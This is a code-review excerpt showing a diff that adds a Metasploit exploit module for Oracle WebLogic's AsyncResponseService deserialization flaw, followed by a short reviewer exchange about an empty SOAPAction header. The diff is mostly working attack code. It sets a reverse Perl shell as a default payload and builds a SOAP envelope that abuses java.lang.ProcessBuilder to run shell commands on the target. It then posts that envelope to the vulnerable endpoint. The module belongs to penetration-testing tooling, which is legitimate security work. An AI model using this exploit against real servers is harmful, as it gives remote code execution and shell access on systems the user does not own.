modules/exploits/multi/misc/weblogic_deserialize_asyncresponseservice.rb

```diff
@@ -0,0 +1,149 @@
+          ],
+          [ 'Solaris',
+            'Platform' => 'solaris',
+            'Arch' => ARCH_CMD,
+            'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_perl'},
+            'Payload' => {
+              'Space'       => 2048,
+              'DisableNops' => true,
+              'Compat'      =>
+                {
+                  'PayloadType' => 'cmd',
+                  'RequiredCmd' => 'generic perl telnet',
+                }
+            }
+          ]
+        ],
+      'DefaultTarget' => 0,
+      'DefaultOptions' =>
+        {
+          'WfsDelay' => 12
+        },
+      'DisclosureDate' => 'Apr 23 2019'))
+
+    register_options(
+      [
+        Opt::RPORT(7001),
+        OptString.new('URIPATH', [true, 'URL to the weblogic instance', '']),
+        OptString.new('WSPATH', [true, 'URL to AsyncResponseService', '/_async/AsyncResponseService'])
+      ]
+    )
+  end
+
+  def send_payload
+    uri = normalize_uri(datastore['WSPATH'])
+
+    print_status("Generating payload...")
+    # payload creation
+    case target.name
+    when 'Windows'
+      xml_cmd = "cmd.exe"
+      param_cmd = "/c"
+      shell_payload = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {remove_comspec: true, encoded: false })
+    when 'Unix', 'Solaris'
+      xml_cmd = "/bin/bash"
+      param_cmd = "-c"
+      shell_payload = payload.encoded
+    end
+
+    random_action = rand_text_alphanumeric(20)
+    random_relates = rand_text_alphanumeric(20)
+
+    print_status("[#{uri}] Sending payload...")
+    soap_payload = <<~EOF
+      <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" 
+                        xmlns:wsa="http://www.w3.org/2005/08/addressing" 
+                        xmlns:asy="http://www.bea.com/async/AsyncResponseService"> 
+        <soapenv:Header> 
+          <wsa:Action>#{random_action}</wsa:Action> 
+          <wsa:RelatesTo>#{random_relates}</wsa:RelatesTo> 
+          <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> 
+            <void class="java.lang.ProcessBuilder"> 
+              <array class="java.lang.String" length="3"> 
+                <void index="0"> 
+                  <string>#{xml_cmd}</string> 
+                </void> 
+                <void index="1"> 
+                  <string>#{param_cmd}</string> 
+                </void> 
+                <void index="2"> 
+                  <string>#{shell_payload.encode(xml: :text)}</string> 
+                </void> 
+              </array> 
+              <void method="start"/> 
+            </void> 
+          </work:WorkContext> 
+        </soapenv:Header> 
+        <soapenv:Body> 
+          <asy:onAsyncDelivery/> 
+        </soapenv:Body> 
+      </soapenv:Envelope>
+    EOF
+
+    res = send_request_cgi(
+      'uri'      => uri,
+      'method'   => 'POST',
+      'ctype'    => 'text/xml',
+      'data'     => soap_payload,
+      'headers'  => {'SOAPAction' => '' }
```

Comment:
This `SOAPAction` is empty?

Reply:
yes, it's not necessary. However, the header is required by the server to process the soap call.

Reply:
Great, thanks!